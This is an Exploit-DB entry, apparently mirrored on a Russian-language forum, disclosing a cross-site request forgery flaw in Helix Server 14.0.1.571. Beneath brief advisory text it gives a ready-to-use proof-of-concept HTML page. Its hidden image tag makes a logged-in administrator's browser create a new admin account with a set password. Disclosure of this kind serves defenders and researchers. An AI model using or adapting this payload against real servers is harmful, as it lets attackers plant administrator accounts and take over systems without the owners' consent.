- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 35092
- Проверка EDB
-
- Пройдено
- Автор
- JOHN LEITCH
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- N/A
- Дата публикации
- 2010-12-10
HTML:
source: https://www.securityfocus.com/bid/45340/info
Helix Server is prone to a cross-site request-forgery vulnerability.
An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site.
Helix Server 14.0.1.571 is vulnerable; other versions may also be affected.
<html>
<body>
<img src="http://www.example.com/admin/auth.adduser.html?respage=config_results.nc.html&name=new_admin&pass=Password1&realm=TESTBOX.AdminRealm" />
</body>
</html>
- Источник
- www.exploit-db.com